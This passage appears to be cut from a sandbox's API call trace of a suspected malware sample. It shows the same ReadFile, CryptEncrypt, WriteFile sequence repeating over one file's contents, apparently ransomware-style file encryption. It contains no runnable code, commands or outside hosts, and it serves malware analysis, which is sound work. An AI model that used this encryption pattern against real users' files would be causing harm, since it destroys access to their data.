out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.962] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.962] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.962] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.962] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.962] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.963] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.963] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.963] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.963] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.963] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.963] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.963] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.963] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.963] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.963] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.963] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.963] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.964] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.964] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.964] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.964] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.964] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.964] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.964] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.964] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.964] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.964] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.964] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.965] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.965] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.965] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.965] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.965] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.965] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.965] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.965] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.965] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.965] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.965] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.966] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.966] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.966] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.966] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.966] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.966] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.966] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.966] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.966] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.966] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.966] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.966] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.966] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.967] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.967] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.967] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.967] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.967] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.967] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.967] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.967] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.967] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.967] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.967] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.968] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.968] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.968] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.968] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.968] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.968] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.968] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.968] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.968] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.968] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.968] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.968] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.968] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.968] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.969] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.969] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.969] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.969] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.969] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.969] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.969] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.969] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.969] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.969] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.970] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.970] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.970] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.970] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.970] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.970] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.970] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.970] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.972] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.973] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.973] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.973] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.973] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.973] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.973] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.973] 